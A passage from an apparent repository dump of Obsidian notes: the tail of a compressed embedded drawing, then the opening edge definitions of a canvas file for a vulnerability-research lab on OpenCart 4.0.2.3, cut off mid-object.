217 | c7YAcMM4BCAMAA7AtAQwJwwUAuAI0BKgM6OZS3o7oeXSxefmaBkBZdSWgmNJLYRmI0gXtuwkgxvtjTz4gAfstb5aGGknroQezuGm4ZEgGRIbAYMErkcAhwLgJCA+gKmh8YdlBQDfGbAMAJ7ZkSgdnZplGd8nUZPkbRlKOOvoL7EETmMYJcyDxhDiMxv8m+LJSFIO8AfixMPxk/Zf2Q6qiZ3aR4m0JeDsSlixDCTnGMiMJHZxiESOZAAo5aOevyY5
218 |
219 | 2ORun1AeOQTlE5m2CTlk5FOXpkGZ+gEZkmZDUPTmWZTOTZms5u6WqnKhuScAmuZ3OY7HGep6QU5uxK0cU6maDys74bRhVn7F65qkn65NJmCU06tJYcd5B4J50T0mEJfScQndOgyWQmoOAzug7JxHCBMlTJGcfQmzJ0zolp5xiye6ljQXqZlqbJLFAGlR0sAhJ7Qinng7k4Zc4XrAjAtkVUDOAxAH0D6klwC0AaGhAPQCWk0nBF5hKIeS87daA8Ur
220 |
221 | THZeadHnkB48cWnMxl8KsZUuDDGnnnQTmFuzBoE9kuDbJX2fiL55wmYXkA5vZm/l0JTQT4ntKcyQyLGW9uajQOe9eRACN55ws3kUAWOTjnt5+Oc5Rd5ZMD3maAWmSumU5A+UPm05ZMKPmM51mSzl2ZU+fukCRLmealgJJ6fpqlJ0Cf3zr5nscjpVJJwVBa75LqfeToJBcEfktJ4Dm0khxHSUOoX5D3hgnywt0a0l35d0eQkjJnVmMnUJUWgxp8F+
222 |
223 | Dp/mFR3+WNZC67qTF5wZXpqbnDZFueW7m5mziRhxRoeKcCqB0BYZESAhwBQA9gmAHIC1A4wEOjMAIwBuBXstQPoCsgbcRmmh5BBYllHZ7yaTGnZMeeQWqOM2H0zdB2ICpQbwFiUzHoEPYBbxnAvMHjB558QK2m/ZnBdRpF5+8aXmo2eUejaV5EsSIW9Qc8NkHTpoSWTBSF6OS3nyFHeUoUNQqheoU6Z/edTnD5ZmfOkM5Vmczm2ZO6Q5nT540bPm
224 |
225 | HpbmYvmOunmfqE2pVau/pr5g4YeS+ZP9s4VgZqCfvnuFGCM0ntJ3haflPc5+d0mBFHhcEVxxAySEVbkwyQ9GjJOXuMk0J2UV4kzJghV/mu2ucKkVQZjoAAUcJpcVkS0qoBTbl3qUJDXZTZ5WmUA8Aw6F0BJAU4OMD6gMADgLnAcAG0B8YM6BwCZQOYSxZvJfcR8mEFsSlRmwyiWQMX+RaSs8DMxaZDPDw4GkFCDzxiQDdDucimQlH1M32UsVCZ28
226 |
227 | ZgFiZJeWSXTJQhjsWJFJ8WPY42IkEoRyGlAacWo50hRjmyFrebjmKFhOTcVsAGmWoXk5GhQ8WD5NOSPkvFY+QYUfFbOd8UmpvxWYVHpPOU7F85XmVAmr55SXYWHBW+QgnaBsJUFnwlBuViWoly/DgkWMEcXA69JnTjiWhFeJWtQElicWxDP5/Qq9G2ODpaM7ixRDgsn/8B6pIC3BGRWCXoAn+tkVFioeM8F2JMzFyU2SiKGwBbg4wHZHxs0iS0Ca
228 |
229 | AIwH+Dt5qEAcragwQcQVBSYQT0UKlfRfp5jxGpeXafhewGqjcwVNCGaOcKqAOR9M1TMu5xoDMXdZoMHBdaUdp3BX3a4pcekuyPiSegOlUihLhnqfiFKaGaSG/ZJZBx6xIMcWz2a4JcBAQNFnxi4A+pMEBJAeEI0DZolwPgCZQgiEICX+DUMGhtA9QLUBQA9ALUBOR0UMXAzogrswDwAfQB3rI5PpecX+llxUGXKFIGGGV3FmhY8U6Fa4HoVvFE+U
230 |
231 | YVfFJhXkkgJC+ZanL5+weelwJjhX6FIJuua4WRh5ZXM6ACkgGpGjl5RhOWFiFgbkVLWCgfloIglaXdlQFHwRGn1iX3j95/eAPkD5GAIPmD4Q+mdq5G9FhMR5GDxkeaqXfOUUoMWC+gsLsAUgXYP6nXALwKnn1maQccbVmOwHtBAkgkKY7SCxIfJ6NuvdtY61BrQdVKtS4OQ1J1B2VRIZWgC7h8BfAXHBIWSAxIJgAwAA0vQCnOYgJoDjoPAAgDJI
232 |
233 | pAMMGSVc+eYXHpHmcUl7BBoT5kXplgiaESAPfvh79+xHkP5keo/v+mbomuV6HAZThf6HJeala3QIlKWgYpXsJuUllVGpgjha2QZWMILzl30mwCpodREYCdpf6e5WnlnlceXeVh5b5UXhF5UWmqOKgU5g68uMIMzLsPuomRZSo7D1DTwShIoQOJ+QdsZIuPMRY7qWzFjAprOJxv+LnG28Jr4sa8mbhjEg8vl/4hJSFSKBCAG4HBAPCzeuiD6kQ6MQ
234 |
235 | BCAVydsCcqDUBVVJAVVTVV1VCAA1VNVLVW1VOZqZVzkWplhcBYglEKgWWDVV6bh69+BHkR6D+pHiP4UebockazVD0PNXKVTqapVUmwYbaZCmupsybdZykeVYxZXJvGGBy37mSzWsmptqb2mFWQ+Axy9fllnssOWQWHyma4J36FZLdOP65yzcugACmdporX6mm/s0E1ZOInVm14dckOXCIufvbVy1etYrU9hy/t3J9Zbpl6lDZBlU6CHe67lCg/As
236 |
237 | 8HAGHVT6qQC2gcEtFCVEGwJID0Af4AMBnOM6By4jAHAPUCopcpaRlSq/cd0W3VHlSQUjx6pU9WBV9BajQ/WsdBcBgujwLZxOYVwAuwZ6aqJDbmlVqmY5g1KLmlVouwIIMRA5Y7CDmQRw5lSKwRi7AhGw55Lq3YPS9HhIU0VmANBnSA+IGewUAmaNZZcM5wKMANQmgFjU41f4HjWX+hNcTX6kpNVUDk1lVdVVKgtVXDD1VjVc1VMAjNRznM10lazX
238 |
239 | dVVqYtx9VClULnGhPNd37i5kudLmy58uR2JK5KuWrnTV+VKkZa50JYtXbRcJXZoH5hubYySAsGRCVd06FmbnGVXCbZi1GsAudDCQdNCUVWVTuegDZomgPqQXOV7JICngcwYcBDArIH0DqAUrpIBsAHRfgWW6ldUQXV1UebXVkFl5YYljw8OL/RfE16hWjCwbdWkFrEIvho5LsGkI2nA1dvKDVop4Nai5WOgsfUr2l7+fwVB8uxf4nOO+0hS5QoLw
240 |
241 | HSmqZm2OvWb1UANvVDAu9b9I9AB9UfXDQJ9djW4AuNYIj41V9STVk1w0BTVU1T9TTV0179a1U8VM+Qelpl/xbJVWFHNWUm2FeDRvleGUfoe475JZQA765e0aA7Vla1M96+FNZeiX3eXmtfk+iuJY2X4lCcY/lJxLOjEVdl0WkY0JFlJUkXUl7tjRySAFcAyWENnCa0g9gtBTsmwC9BvPCEg7wVtZwxjGK/j4AiBf0CYAVQA/hhu+AE6FBGRuisWX
242 |
243 | VZGRXXy8VdVdU11/RWI311AUf0pTwOwPHQzwJMGvG1sL4WfAOc+IO8A6IlkAW5JVNqto3D10CD2Z2lb0eSWOlwhH2VFRIhStpg2WxGvVvGDjU40uN+9ayCH1aWp42n1PjefV+Nl9fUBE1gTXfXBND9dTUv1tNW/UM10TT8WxNLNRYV/1cldYW5lKTR7Fc160UWWbRMteg0GBQcfk3H5KJQU1n5nSa06RxHTtiX9JTZdU0tltTT1aDODTcM6kl3zT
244 |
245 | 2WTOzpYwkDlWDcjCbVgBRYq8QK7tbleMOjvsCuOEzSAbTZesPqBwwkgCJypoTkX+BBAMAGDDOAgRpK58MwGj3EfOOBkTE5pPlXbpqlhzZTHPVs8CjSYQOPsoE6IkUaSCTQnbKjRRkILVsaaNMNkPUkhHzelX6NNjs03xF5eQIVsa7TafEwVJmELAAgiQaC0b1HyBC171bjdC0eNm2F41n1F9QTUot19bfX31lNY/XP1r9fTUf1+LSmWEtP9cS285
246 |
247 | EkdmVWemRRS0N4A1dS0gZpwWMV0tpZRg2rV+OpVbIlhTY05eF4caU1De5TQ2U8t3hWEUgsrZXU3tlwrSnGit3ZS029lpjfMk/5g5VBkcYcrYyVAFkDIGbhVi4CSCWVkzdZUSAbQA0SXArIH97bAgpUMAcA0UPqADAj1OMABG11ngXkZ4eSeVbNZ4TRnOtF2deGYgJzVsA7wvjIVq55aeVCgnGcXO+I000uC80F5ENRsWGNsbdsV/NO7cIXmN/9PQ
248 |
249 | 6/AQaujXAS9jVm08AO9Tm3uNsLQW3wtvjf42ltaLRW2hN1bTi21tUTe1V/FMlWzWLRZLfBmdtSOpvkZNDqcWUDtOTWWV5NSJcU3jtPhf8pTt7LfgmX5a1MT4IqvLfO38tERYSVRFxJY0122WHWXkStbTS6VMJ07oQDLJeDUDHjl6yVHWuoJNMM025/4ijU/A09I7kwFFQEkB+G2AHxg8AmUEkBwwp4OMAbgqBmeAcAVQMQB8YGZta1aJUjgB27NQ
250 |
251 | HWeVOtfkUc2alN0ALDjwLItdBLspwPPFwKrNM8AbwuNlhBmlXmIi6htbzeG2hco9TAoAV2LsBWIRcba+Lp6ZKVnqUpBHa47tkpIDY0nFa4AW4bAfGPqTjoAwNmjfeU4G0ADAp4L1hFocML7WBWM6H+ArKMEHDAbA9AC0A9AygEqD6k+pDBJ1EQlaUDkdW9ZR3ON1HXm20dZMIW0ItxbQE031QTZtghNVbeE24tdbVx1xNPHSS2JN3mUA0OFhZb20
252 |
253 | wl4nW4g+uVwYIkHquoMYqMYmgLUCEA2aPEC2g/Mnz6DwiGWkrEdAsNojm8WjuDGMxIzJlLHALbBAxnACtFDUoQndVV5Y8TGXIgoKRlfRll2qARaXLF6HT3brFxvmp54BipXgh52FQEQG9ukIX8nAizCF6VLB39fPm/1LbUCVrVDcvVD85kkip3kuEVaGjxV3+nGEOd/+kjA1M5vEnVpNpJj7F9tLheBlA9cMSn4/SCHqQB3uv7S1l5+U/s+43uxv
254 |
255 | bwBUoMYRoj+8jVDyYm8dfpmGmKgHsB6R0zfiNSpyEHpbXFhypjbXlh/tZb2vupvch5fULpmv7oeh1FVlu1PyLpWMYYuTgAQNMucoBy5CubA2q5weasmAZqjtcBvhWIK+GF6VNI+Xt1bqOr7d1pxi5C9mF3s16nEIeNIEcxuVVqUo0cfqWz0yglCl1VucDOgE/l54op44Bpviz3uRmnuz1duoQD262+Bzcl2kd6hNbGmFRLV1Ui9PVTK2EVHtBzVf
256 |
257 | c+XFWy3QKgd/p8wpDTblkMk7CxTq99hcJ0yQ8VEF6I930iMA8APLrUCsgSQLkDINWvX91MiFWPoG7R5Vsu2CtT+Wu0v5j0WV7YwewBZLWQ4npuz1eJJR1619d4hOah4vFCnAlAqqHEBYgJxOAVMyXYA163gzgDAOfWFmOAEID9kL/SVsnMrAPS4rwEwnr807Zy31lo7U6LV4P0NkCzIKdWnUZ1WdTnV51BdUXWop2oBjCPA7UHH72JvUFuxdSPjH
258 |
259 | qjMI6PqgDoEiYDIOyDMg0d5BB+PhTqQ8JxttCoQwaP9bXwwsPZBtQKNDsBVm8EUSCmWdDoTwexRTQ9wMD73hUCzZ82SjlLZK2WtkbZW2TtlQ+fA7D6t9WxCYxfqng7sTQCm2Cd4UwUg3j5lNIWmxCqDXqBoNo0Rg4gNleAg/oMbwhg2hAkg8OJcCmDQRYu0LtXTmXTboJsGz7/QjyDbCMw9sI7AGiLsFenqsspAUK+woQ6u2sQQAwiGoDRjtdB4Y
260 |
261 | EAznCRwz0N2hIDuA/X0EDTfXUPIDIA2gPNDGA5AMLJldLNwXcdcKXCNwLDs9BTDDcAQD1UO/ugC399/Y/3RN5RsF6alBwLsBe6KIeYlwdUVavAo1y4r0pri8vsAGKUv9JqjuO1NCFGMhwhNr6Apn5T316+ffQ6oD9TPbgEy0WaU6CEBE/cQGJdflY9Wz992vP1SVQvc22ZlrbZpUGKkThZ6fd0vX+LjwKIwnBVGAdmhnk0HrHhj6RAiXDFUt2udr
262 |
263 | 3ZNAPal5696tgb2sgSwBwCoAQEHYDthFQJSOcANI3SPvulfnFma1iYUEPksYpq70N+2YU35m1vI2352skAFbUB9w1eA1S5qfen0wNyuVn1j+QfRSyMj1I7SNYpvYRH2r+aAAUMx9rtadTx9lnTZKmG5oZaELhWaLaH2hjoc6FqjGuTkPCWd2SjSQoplo2TmJkvl1LLinULjwFuTMr2a4WnuDsCCQ8dYSAh0g6YvDut2GrjD2Je8I5xx5Lw32y99K
264 |
265 | VWUGhcnw5s0m+bbts1t28XdP42+enkl0gjxlPOZL5LdNO5uVwJYiPFRRji50sl1KvHwH9JGKcDjwsIttCn9VLWUOi1Mbg8EheesH8DMAkDfelAZqYr92oNgWRJ1DtGlUGJadbZRg69C67USUlA+wGnr1jfUBc2VMs8FgPTAvowiD+jYlhOyBhakPOMJAi4xrhDkupWuMlAG46zQBjO41jRIDXwN8gnASMGSAkgGoGQQDAlA7WUEJKnUy1jelg+nS
266 |
267 | zI46IIiNAumecAtAHwrwObemMK30VoAFNBPQT3qDWwSDgQ9INyDyE/TTretsDO2hDx0LuIW8OEzhMKD0wOtBGO2QcRPETaQxrATtL3j+NpQsyEqA/BuAH8EAhPsuBP8D3yATAyDfwFXZiEUEcd6SDZTAnDjN4FB1JKWaE0oPgqKg2hBbQMg18BAkkDDIRzjL2Z1AFMrwETQrgZE4iVztN+aT7ioTPlT59NptiT5MgDPjpMs+psMsAWw6/l0RFDDs
268 |
269 | MkKtjZMPXKVDI7Z0O1Da0DCAHjeGEuPmYK44cBtDuVB0M1D541uPFF5mLuN1D+42cDuTR415M5wL/epPpQxcNMOLDsw7XDxTCwxXBncywxADdjvY7NgP+7Yx71SoS4vHDrGa1nvCS+TZnjIVUMpNB0VYUNaGOW8vuF3jq+VzTh3jM4jU2l64gCPT1pVyY9F26czPT8Nh5fw2P0+gAI1z2/JA7rz2VYFUYWP1C07rgVttUvYyK3QJMDPKoZmwkuC0
270 |
271 | OwU0cADKeIxH7dthIzCVuca2rr0q1RFgb0F+s/sX7jUZfvSNduM/un7z+N06yOxZ1fgllcjOtTyPe9bSPyPZZ01PX7CjHfv72CspocaNWhZo3aEOhTodyFqjtteqb+1F0w9Ml+T053Iaj/YRZOVZuoxGDYeCfXrADoQ6COhjok6NOhzoC6Eugro8PTBjUewlmHiJ5M8G45Eg9DpL52cMqMGaszWGVG0RgxwOd4NkiqIcSlu5crjDuognsUVFa/UB
272 |
273 | VgxjbBZTLxjYbalURtPUyRmek/U/+1DTJ4Q619u0/XmN89004CUr9jWYAIG11qWWPGWWXFNCzxZ6n1CBmmiFZBoEVDde26KBIyg0wsU9MJP0tX/URY/9L0UK1UJIrR15HA4DDzPusfMx2VtlTwFzNccikLzNbEJjnuOCzwaMLOEaT4sSBvj1A3WVX5nhZRObYjA39AVABKHlCFQxUKVDlQlUKQDVQtUBL3rebg8sSt9fjGdCo9WxNiATwIU2j6IT
274 |
275 | kE8hOyD+E/uWiTBtsZC6D3MF2ChopIO31pka7j0KIdf1TKQfyy7gSBqTfonJ1JQmc1YMSAAqsIlmAbQJdB8YkpUMBhACae+obg+4bd6Vzvc72BeDIgyTBE014+TC1+IkyEOWCYQ7/IRDHwFENoQMQ73PxDl8InrGD5mDPMjtGQ7J1352Q6ka5DZk/kPozkvFZMlDl/Fy3zDZcIlPdO0CzMNocGU9MpKgxABuDOAmALgBFobANmhjKFUDq1nOPRvB
276 |
277 | mz4T/iKMSNMlnerbwjdGgQKNP/nhjutU9AQTbEzKhlUoycClWyXQcIijX8z9UpZDyQxHewsLWfGV3009cY28MJjO8bmSv4naWmFfDQ/QNNdFvAP8Oq0Y0yB1RSlkBIVDA5wIIg3A46IaTOAmgEYC3Ia8IIjg+hwCMA8Ds+PqSZQf4MwCaAYMGun4Au9HACnguAJbSYAQwPqSHyx3vqDScp4Kmj4gzgLgB6tWaMwDjAzgPlDjo0UCcy8dbvgeq8Nk
278 |
279 | vfPO5lucak1FVH6EcD8QGBGtN+2vUOu6a4VmOnrNjUJa/0HSO+CRquzgcUsM4z1g0kDrZqJpoCKuqyVsPl2FmAkGqUKvcuwy6jMZWxnUIzCj4zQivhSDuo0uDFFkYxkrlWU9Es931xj/vhw5dT0CFIvxAMiymNKz6Y0ouT9OY8CP8WutPz2lAmi9ouHAui/qD6Lhizlw9AJi1OBmLFi6QBWLNi3YsOLTiy4tuLHi14ujkPi/oB+LAS0EusgIS2Es
280 |
281 | RLUSwk2zTB6ui0LTu/PlzVmY7Pn1W581jjC5L0ZORjetu0/bNFLmTfJEQUA0LUyf9FSyw4G9Ifdb2vNs+K1nweL7niu292QB+5I2r0z+7vThtZ9ODIwQEB4Cjf07yN5ZkHhnLW19QrDMlZWpEb13u+KyHWR9Wo6Au1hmMwqzeTVSxID/jgE+OjATgUqXQZAg6CMiospC6PCwgeMjoGpSChAarHDEmX1BI+kQ0yo30MCicAkMPApwupSO8HpYZSpq
282 |
283 | woQo1q4tGPPDks8inOJqxSFgPELBIP1pjrPTs1CNezSI0azWywkuei+XD7hDQmFpx46RqZA+KHDonVfrOzN3kcnUNj+vIYrYNy7Yv2LSoI4twwzi64vjA7i54sNQygG8sfLPAIEvBLW878uRL0S6mItjWdKA0SARo0qAWhYMzaEQzlo9DPq5YtQVRzVqYmYxy1uK7ysKA1YZFmYNrYO4BPgMkMdBpc1q/8DmrYkJOsCLZq+46zc4E9cj6AG4PBCe
284 |
285 | 2oJUMhMwSwHICJLZMC1AIAAmA4BOAW4PuClgGdHjoyzMoG0DwQUtKyDWA9AKEBsq168QC3rUAFLRmaUfU+SvrzvDWGvrtJlFI94uVMeC5QTAO+ufr9JN+uRwoG+9geScgv+uRUYG6QCAbSShg5ylWQHWiCIGKIQCz+367F4ex07rKXOxhEGhaam/a2PAKA46A7BigLy7wNkrbI5SvO93IxmFfTAHgyu/TnLMysW1T6o41wwU4Ca1VAKiY0vX9Ejd
286 |
287 | uI4wVwGJ7UGzZvPH6O0k3JYVMsfIr5nwp0O1IaoavlcByZbUxo2Nu35eIs5kZuLJTursi56sj9h2ZmMEx+zeeUBrIK0GsQkLwDl2rOymUr1e1nwAyoVUjs/txxrCtJtaatEhdcvWLaa/ctZrjy7mvPLBa0Wv+LJa18s/L4S5WtnKNawF6djFQDel3pD6U+kvpb6R+lfpf4D+kXVbYzNVdrEtT2sIsfazyuUb1Gyd5kWw68O0N+QM//WcrFYclkUb
288 |
289 | 2wFRs0bZFrdPUmLW21tVbBrMrUYzhps1P8rmo73LR9sIw3IbDJG3qBep+ld/q9Qv+qyWmSB4q+FXtfmzZI9AGaBsCvpAMnxgcutoMwBbpw3cPr0TfDcrOCNypWrPc9E0ygGTLEjZzB4ypIJfFJuElpL4rgUIu9WzwW7j9acxBIVvH6bxZIZvMEluLm69pbQTlXGNeVVlUCGo6cm1IQLMbPEeO9KSXrZorCHDBGAPQLaAjAARqy66GRtDwD7MVrSm
290 |
291 | uBbdyxmsPLOa3mt0bzCJFufLZa6Etxb/yzEsZWgDWtQOzxS07Mrg8ayOMMt1wQerpFBo0QtNL/TU6AN0PCdZj56oab5sqResJF58Yp4COjmAp29s0ldNrX6vWb52QCkMZaShZhp6tnGm19KZxJj1czngzdCjgOMJZLBtioCilzLuZJimZR5mNzN3le0D/QrGWmyIViesZJ9lazSOwsz0AqaM4CTBAwJuGmg83qeB/gxAKoCZQ+APvINQKO+mBo7G
292 |
293 | O1jtGAOO2n34gBOw1ABbty+muZr2a08v5rw0IWu+LUW6WvfL5a/TtVry/f/VnpLO8isxrO+bws3qQYUiy2gBsDuAwQNW2OP0bTVC9Ma1TvXyZT+NLM3tqACADBAZZxtT9Om1TK2xssrfvWyvijEKo1v+1A+y3vD7vvXkax9eo5XKe1ZpmL0Zi+8xXiErwWXkCD7re3ADB1vWWh7um/O5kXELo4b6ZIZvABdA6R8OF2Dxwq21LsVAy8/lCrz685vP
294 |
295 | bzmULvN77+5fKUJd11eZs+rIB1Zu5jNmy63CWA0BNCmQdDicAaonfUcPOAM0i+UZdsdHrwjzsY04m/bJdRJTvNNu3vGgR/ZlPXtS3E782zskOXBFLs+A4vVkQOUvQy2BKmT12lASQJyBGAbQPlD6kfGNsBKgxdS4BKg2wCMDMYG6Q1C+7/u9gCB7YibgAh7YexHtR7aMJtix7N7OjuY72O2wC47qe4+3p7qayTvZ7oWxTsRbhezTsl7dO38vl70I
296 |
297 | 6L2GzmHNXvdttk99J4zyVITPpUJM1lTkzCDZTNFbUsJLWOpX6PXsnQy1VFnTZB6ifS9Nk5QM0raOFvwtM8MMaUVatFQJgC3I4wGwDjALDX+AxsowG0D6g+pKGUP9ZKn+1K7lvpZuq7UB+rtU9Bid/QLxuxFdAi+1ZvhNOcONOPDlM8OBWhlYMuH3WldTq/gfW7PILbs8FmxblEeqn0UIUGCxlnoINjcFRIUcHbAFwc8HfBwIc9AQhyIdiHxqZIcB
298 |
299 | 7Qe3If8OCh2MpKHMe6jvqHie8nt47ae8NAZ7QW6Tshb5O+Fv571O9Fu07Fawzvvd7NU4TktsCcA1KV/h0zIJYQRydOupjLdJ3ydT0BRMydbLf4UYls7dy035VTRp1AgHsxMlTjp45MlDHH0f83JFbtrSXIWnoVftjlJI5EdL4xwJbPkYV0DiNv74dr4ZN6zgOMBKgFAMaT7ylwGDBQAlwLUA70ImPEspjpR7F1Kl0GpdvjT9vpNO3b1R6rgbQnxK
300 |
301 | Kckgr25wQlVk6aSCa4GY0im8gVuy6tAR5Ie4ksLvBWXktT8bXzpV5xlovDtH9c4ju2NuhZwfcHvB/weCHzgMIeiH2AOIfDQGx9IdbH8h+Ht7H0e8NCqH8exodJ7Whynv47uh+cf6HWe2Tu57lO5UD3Hxe7FuWHAK3x1JNNhR8ffdIndvnyRgR3vmjjUnenNgn5E3PMk6inQEVQnv8yCc9OcJ9RACtns3/3ezM4001xFhnZMnonHTVic0c6wBEe2d
302 |
303 | pGNHMubYDNdBJDqHYivudzuRPoCHqVAKD0A4rnxg4NeEuKChGiu16vK7WifdW6Jgpw6vNLgs5dBulvAsAxohiZNNru6ZwIFGBRfAj9v/hyp7vGqnao0auonR8ZK26nBHRJYoiPQd7t05ppwscWnyx1aerHtp+sd+7mx7IfOnih26cqHhxwnuaH2h36eE7FeIGfBbOe2Ft57/g+Gcxbpe1GeM7JSbGfvHFSYpU/dC1TCwpnwRyOuxTlZbPN4XYRO+
304 |
305 | PKd6Q82WFnBZyWcTjK7UidQDVZ7g6O2tZ3h31n+cQeoPAzZ9Q6Ob7Z3WyFct2Rq3v7KGNfhsuBAqQADA46GMEOZshS0BwA2aPXpTnZm3F3gH5dcB2kFM/WB0TxNuILNTyKgVqWoQkvipTKUfwNtOhRf9Aed/bv63zEnnmHWK1btWpyY2XnexeY0PG48HCmelFUQ+dzHZp4seWn1p2scSHn546ffnOxy6eR7f52TAenRx0Be+nZx5tgXHBh8GdQXo
306 |
307 | ZwXvvLRe3BcWH8W4he9VyFwJ3xn5/QdOGMWF/8duFHexrastWZwRduIRF5iWxT5FwDzVX44w/m/99TRWcADsRXRcTODF3Zf9le7TK3l7A2UQuzbqzpNm1jT4NeqVsvjKf2hemUKyBG0A4pIDnAcMCbQLp7AC5LRQPQM4CyXoB/JcXbd1Y62bLFR0Kc24GoAkBQoYs1TSCDul/iAJANiZCQkgmEN+E6b0CEqfvDvnAMf/lt4oBUJ6hKaBX1S4FS11
308 |
309 | QVSNc/AXeShHefGna4FTib0bAJICDozVb4D2gWxOMCZQtQIaT8p1yDOh7zf4H0DjomgNmi4CSxUIAbA00vgIj5j5+adLHKxzad2nm2A6cyHwe4Fe/nyh6FcAXXpycc6HoF6RTgXVx5BfGHdx6YcPH5h08dWHM0zGdGzkJftOebAR78epn3O8D2kOzwGD16wJwNKXJH/6hTMIZHY2krb4o7IV0YamqMhCvbCIB1CVT0k0SBVpubmm5uc2IOjSbQCN
310 |
311 | UyHabCp5cSdTR50mNG+yy98Nnbii8NOKXQIw9XQH+Y65feLPNxGfwXaVy8cQqxRliDr9wt2OnR1WRBPZcemFjgd5Fz0hB2GX2+OSd7uNe0me+x3m9he1bBvRuB3tqAOFlS0HCeQDm9z1PnfZohd2aAcJatS1Q97WtVfMfTrG3Svu9jK1xtT7PG6KP1bRWRP7+1Fd1XfF3fTcNtozY22vsir2/uKvoAqW/emPpz6a+nvpn6d+mHAv6SrcALnRIxmQ
312 |
313 | innm5vqD88Fqs4DiYBQbh8MxVVOOcIAUaqNspJ/gqbGEO34w3Zw8/ff334s4uciLUs2ItmX/fc7e9TyCCster8p1tcc9OnoCMnZau/8lTT3u4LexLMt2H0IjOZVlc5WcOagpBVTuACDojVYyZVeMGBPsBSNad+oFrRjh9ftNLT6gIfBGrIDg0pAMU7Xv+ZS1QVfqV57gieAD0481esQKnBlJx0WxFl2PiG0DoPmS31m0f24lTIY7InzgPHT5MgDB
314 |
315 | w9dg3MNw/QpAzCcA7EG0MGhCP2eZ3Va4FNImDX3t4NqqdQXqMlhmSl0MnO5nkJ56JfjGc2TBZzU3lGkx2QS3GlJACaUmkppzAGmniO6MMxOio6xIoTFFLkGhpXNCEyZgHj3MAcX9K1dsEMYTiCzlbmD+6296/jesHxsCbtesJsHzLj6vBtk7pdnmg2Ndllz57vExND7wYaAyrI+dM8E80D02/A9EJBkwbDaTlPiz60+ZT0ZOVPHCaz7ALlS7icJU
316 |
317 | xD/9JkPq94Lsqr+kMkCCDu8Agd73JBMFHHXj47xTQVY9dfSCznrYY6AkYNq7swHuB75zSzFXbLNO3YtCZtm+v94QGAPKi8peazYD6pkQP/AZpL7AEd3YeGC+kMINxcVRlCv5F7nicRyQvF+Vas7KK77HWQOiI5yYrEGeVYG9+oKaCBAxAKgDYA/z79DlwGw6Xf+1vzxFgAvQLwGAgvB4KStd76tT7LxZVKy/CNIY+yX5t3+YUKMkA7fkWGz7wMxI
318 |
319 | DT36W3PdZbi97lvL3+W2WHFZTW/Wt/PAYIC/Av2QKC9GsqM2HWj3wq4Ntir4w5DqvwgMIaDvo+69AAogmQDNYZYqwAwCEAG5tFB2qEizAgqgSy6UCbeiwL9DjAO4Nf73XuZNLMN+IgCwRqvGQDK97GcggcY6vKr0wPqv9QAeWqertxK/Kver+q+Ggg02z1Kvur6q8OvmY9b66ehQKa/2vGQLRbqzQBD69uvGQKhs+3Qb+a8ZA9QMSwN3EuLa+uvE
320 |
321 | b8Jh29ddy69mv6UOq9PU/7vSsS84b2m8ZAArxpOVNJJDm/6v7y9U8wqWk3fuij8b7m/6Ax/CMAz4DT+vcCAQLxyD4AVpomSnEl19jzp6meXvhWgLb3qASqdncDZ00GqD2AaURlBABGAESGEpVqDAAQBWw23pOzx1ndMW/qv/r174AN9ApVgkA5K6RgSvkoLu87giEwe8Gwb601oIAp4KKyz+88ju87xHcB4Elo/aMoCigAABTKT1AA/tLwX75+/t
322 |
323 | QhwAACUloLcjKApYAsDPvb7ycD0gRglB+Qfv7wLCAfq73a+/Qjr9/C0mqhmFhck+JggC3IlYAbD0D5E0qvmTHLw37Ao0Gy6Cisor4KvEfdT/Vmjbl+whiBkZOCkTFworOKUXvV74R+3vYoD0iMAIwBEhpTr3uUaXUKRIojjILUKuv1vSRFLdwxVA/LBoYGBc1X8f4iK3DgAbcBhvLcEEGBBAAA==
324 | ```
325 | %%
--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/OpenCart 4.0.2.3.canvas:
--------------------------------------------------------------------------------
1 | {
2 | "edges": [
3 | {
4 | "fromNode": "f3ca64c09118de8a",
5 | "fromSide": "top",
6 | "id": "427a35b76aa7f49b",
7 | "styleAttributes": {
8 | "pathfindingMethod": "square"
9 | },
10 | "toNode": "26a93c7e36d59dc7",
11 | "toSide": "bottom"
12 | },
13 | {
14 | "fromNode": "f3ca64c09118de8a",
15 | "fromSide": "left",
16 | "id": "fa14aabcf6f8045c",
17 | "styleAttributes": {
18 | },
19 | "toNode": "ce573b456236baa2",
20 | "toSide": "right"
21 | },
22 | {
23 | "fromNode": "f3ca64c09118de8a",
24 | "fromSide": "bottom",
25 | "id": "75239d7a17720e6d",
26 | "styleAttributes": {
27 | },
28 | "toNode": "bfd937018307d703",
29 | "toSide": "top"
30 | },
31 | {
32 | "color": "2",
33 | "fromNode": "bfd937018307d703",
34 | "fromSide": "right",
35 | "id": "617fd12cc3744546",
36 | "styleAttributes": {
37 | "pathfindingMethod": null
38 | },
39 | "toNode": "4006fc6337572b1e",
40 | "toSide": "top"
41 | },
42 | {
43 | "fromNode": "f3ca64c09118de8a",
44 | "fromSide": "top",
45 | "id": "75e236a6bb057ffe",
46 | "styleAttributes": {
47 | "pathfindingMethod": "square"
48 | },
49 | "toNode": "7a9075e0d6907e67",
50 | "toSide": "bottom"
51 | },
52 | {
53 | "fromNode": "f3ca64c09118de8a",
54 | "fromSide": "left",
55 | "id": "0402e666a935a1a0",
56 | "styleAttributes": {
57 | },
58 | "toNode": "7429e754d0a422cb",
59 | "toSide": "right"
60 | },
61 | {
62 | "fromNode": "7429e754d0a422cb",
63 | "fromSide": "left",
64 | "id": "685eec0c9a8b277a",
65 | "styleAttributes": {
66 | },
67 | "toNode": "7ca354fd21654453",
68 | "toSide": "right"
69 | },
70 | {
71 | "color": "2",
72 | "fromNode": "bfd937018307d703",
73 | "fromSide": "bottom",
74 | "id": "36b7ae96f96115b3",
75 | "styleAttributes": {
76 | },
77 | "toNode": "f4c3c7183fbfb086",
78 | "toSide": "top"
79 | },
80 | {
81 | "color": "2",
82 | "fromNode": "f4c3c7183fbfb086",
83 | "fromSide": "right",
84 | "id": "fda5e75b404e6dba",
85 | "label": "related",
86 | "styleAttributes": {
87 | "path": "dotted"
88 | },
89 | "toEnd": "none",
90 | "toNode": "8cfb2fca32a6a4b3",
91 | "toSide": "left"
92 | },
93 | {
94 | "color": "5",
95 | "fromNode": "bfd937018307d703",
96 | "fromSide": "bottom",
97 | "id": "fab473e35a87a341",
98 | "styleAttributes": {
99 | },
100 | "toNode": "c3b5022e0cd777c2",
101 | "toSide": "top"
102 | },
103 | {
104 | "color": "5",
105 | "fromEnd": "arrow",
106 | "fromNode": "c3b5022e0cd777c2",
107 | "fromSide": "left",
108 | "id": "93cc0aeff045e114",
109 | "styleAttributes": {
